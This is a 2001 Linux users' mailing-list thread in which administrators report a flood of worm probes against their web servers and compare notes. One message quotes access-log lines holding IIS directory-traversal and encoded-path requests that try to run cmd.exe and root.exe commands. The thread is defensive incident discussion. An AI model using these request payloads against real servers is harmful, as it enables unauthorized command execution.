[ale] CodeRed attacks, here we go again.
Brian J. Dowd
bdowd at DentFirst.com
Tue Sep 18 14:44:20 EDT 2001
Yes, 1475 attempts so far today on one minor server.
-Brian J. Dowd
> Ditto here. 400 hits in 2 hours. Looks like another Code Red Variant......
>
> Mike
>
> -----Original Message-----
> From: Terry Lee Tucker [mailto:terry at esc1.com]
> Sent: Tuesday, September 18, 2001 10:24 AM
> To: SAngell at nan.net; ale at ale.org
> Subject: Re: [ale] CodeRed attacks, here we go again.
>
> I'm getting hit with the following:
>
> 208.5.209.246 - - [18/Sep/2001:10:30:26 -0400] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 283
> 208.5.209.246 - - [18/Sep/2001:10:30:27 -0400] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
> 208.5.209.246 - - [18/Sep/2001:10:30:28 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> 208.5.209.246 - - [18/Sep/2001:10:30:30 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> 208.5.209.246 - - [18/Sep/2001:10:30:31 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 208.5.209.246 - - [18/Sep/2001:10:30:36 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322
> 208.5.209.246 - - [18/Sep/2001:10:30:37 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322
> 208.5.209.246 - - [18/Sep/2001:10:30:39 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir
> HTTP/1.0"
> 404 338
> 208.5.209.246 - - [18/Sep/2001:10:30:40 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> 208.5.209.246 - - [18/Sep/2001:10:30:41 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
>
> Obviously, someone is trying to get something from a windoze box.
>
> SAngell at nan.net wrote:
> >
> > I am being flooded by Code Red attacks originating from network
> 205.152.x.x all
> > by the variant which is attempting to drop the trojan backdoor on to my
> servers.
> > either root.exe or explorer.exe. This attack is worse that any I have
> previously
> > seen with hundreds of attempts in the last 5 minutes.
> >
> > Anyone else witnessing these?
> >
> > \_\_\_\_\_\_\_\_\_\_\_/_/_/_/_/_/_/_/_/_/_/
> > \_ Steve Angell, MCSE, CCNA _/
> > \_ MIS Operations Manager _/
> > \_ TSYS Total Debt Management _/
> > \_ Norcross, GA _/
> > \_ Phone 770-409-5570 _/
> > \_ Fax 770-416-1752 _/
> > \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
> >
> > --
> > To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message
> body.
>
> --
> Sparta, NC 28675 USA
> 336.372.6812
> http://www.esc1.com
> The Gates of hell shall NOT prevail...
> --
> To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message
> body.
> --
> To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.
begin:vcard
n:Dowd;Brian
x-mozilla-html:TRUE
org:Dentfirst, PC
adr:;;;;;;
version:2.1
email;internet:bdowd at dentfirst.com
x-mozilla-cpt:;0
fn:Dr. Brian J. Dowd
end:vcard
More information about the Ale
mailing list